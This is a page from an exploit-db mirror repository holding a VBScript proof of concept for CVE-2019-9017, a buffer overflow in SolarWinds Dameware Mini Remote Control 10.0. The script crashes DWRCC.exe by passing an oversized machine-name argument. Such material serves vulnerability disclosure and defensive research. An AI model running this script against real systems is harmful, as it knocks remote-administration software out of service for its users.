bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/46793.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

32 lines
No EOL
977 B
Text
Raw Blame History

#Vendor: Solarwinds
#Site Vendor: https://www.dameware.com/
#Product: Dameware Mini Remote Control
#Version: 10.0 x64
#Platform: Windows
#Tested on: Windows 7 SP1 x64
#Dscription: The DWRCC executable file is affected by a buffer overflow vulnerability.
#The buffer size passed in on the machine name parameter is not checked
#Vector: pass buffer to the machine host name parameter
#Author: Dino Barlattani dinbar78@gmail.com
#Link: http://www.binaryworld.it
#CVE ID: CVE-2019-9017
#POC in VB Script
option explicit
dim fold,exe,buf,i,wsh,fso,result
exe = "DWRCC.exe"
fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64
#1\"
for i = 0 to 300
buf = buf & "A"
next
set wsh = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
if fso.folderexists(fold) then
fold = fold & exe
fold = chr(34) & fold & chr(34)
result = wsh.run(fold & " -c: -h: -m:" & buf,0,true)
end if
Reference in a new issue View git blame Copy permalink